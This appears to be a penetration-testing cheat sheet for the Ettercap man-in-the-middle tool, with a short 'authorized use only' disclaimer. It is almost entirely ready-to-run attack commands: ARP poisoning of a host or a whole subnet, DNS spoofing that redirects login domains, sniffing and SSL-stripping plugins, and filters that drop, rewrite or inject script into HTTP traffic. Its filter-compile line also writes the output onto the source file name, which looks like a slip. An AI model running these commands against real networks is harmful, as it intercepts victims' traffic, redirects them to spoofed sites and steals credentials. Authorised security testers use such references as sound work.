ETTERCAP
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Network MITM attack tool for ARP poisoning, DNS spoofing, credential sniffing, and traffic manipulation.
INSTALLATION#
sudo apt install ettercap-common ettercap-graphical # Kali/Debian
INTERFACES#
ettercap -G # GTK graphical ettercap -T # Text mode ettercap -C # Curses (ncurses)
BASIC ARP POISONING#
# MITM between target and gateway sudo ettercap -T -M arp:remote /TARGET_IP// /GATEWAY_IP// sudo ettercap -T -M arp:remote /10.10.10.5// /10.10.10.1// # MITM entire subnet sudo ettercap -T -M arp:remote /// /// # Specific interface sudo ettercap -T -i eth0 -M arp:remote /10.10.10.5// /10.10.10.1// # Quiet mode (only show captured data) sudo ettercap -T -q -M arp:remote /10.10.10.5// /10.10.10.1// # With output file sudo ettercap -T -q -M arp:remote /10.10.10.5// /10.10.10.1// -w capture.pcap
TARGET SYNTAX#
# /IP/PORT/ # Empty = all /10.10.10.5// # Single host, all ports /10.10.10.5/80/ # Single host, port 80 /10.10.10.5-10// # IP range /10.10.10.5,10.10.10.6// # Multiple IPs /// # Everything
DNS SPOOFING#
# Edit /etc/ettercap/etter.dns # Add entries: example.com A 10.10.10.100 *.example.com A 10.10.10.100 login.target.com A 10.10.10.100 # Run with DNS spoof plugin sudo ettercap -T -q -M arp:remote -P dns_spoof /10.10.10.5// /10.10.10.1//
PLUGINS#
# List available plugins ettercap -T --list-plugins # Common plugins dns_spoof # DNS spoofing remote_browser # Send URLs to browser repoison_arp # Re-poison ARP cache sslstrip # SSL stripping search_promisc # Detect promisc mode find_ettercap # Detect other ettercap gw_discover # Find gateways rand_flood # Flood with random MACs find_conn # Find active connections arp_cop # ARP storm detection # Use plugin sudo ettercap -T -M arp:remote -P plugin_name /TARGET// /GW//
FILTERS#
# Compile filter
etterfilter filter.ef -o filter.ef
# Example filter (drop packets):
if (ip.proto == TCP && tcp.dst == 80) {
drop();
msg("HTTP packet dropped\n");
}
# Example filter (replace content):
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
}
}
# Example filter (inject):
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "</head>")) {
replace("</head>", "<script>alert('xss')</script></head>");
}
}
# Apply filter
sudo ettercap -T -q -M arp:remote -F filter.ef /10.10.10.5// /10.10.10.1//
COMMON COMMANDS (TEXT MODE)#
h # Help l # Host list s # Start sniffing p # List plugins q # Quit
TIPS#
- Bettercap is the modern successor to Ettercap - ARP poisoning only works on local network segments - Use -w to save pcap for offline analysis - DNS spoofing requires editing etter.dns before starting - Filters enable real-time packet modification - HSTS defeats SSL stripping on modern browsers - Use quiet mode (-q) to reduce noise - Multiple targets supported with comma separation - Check /etc/ettercap/etter.conf for configuration - Disable kernel IP forwarding check in etter.conf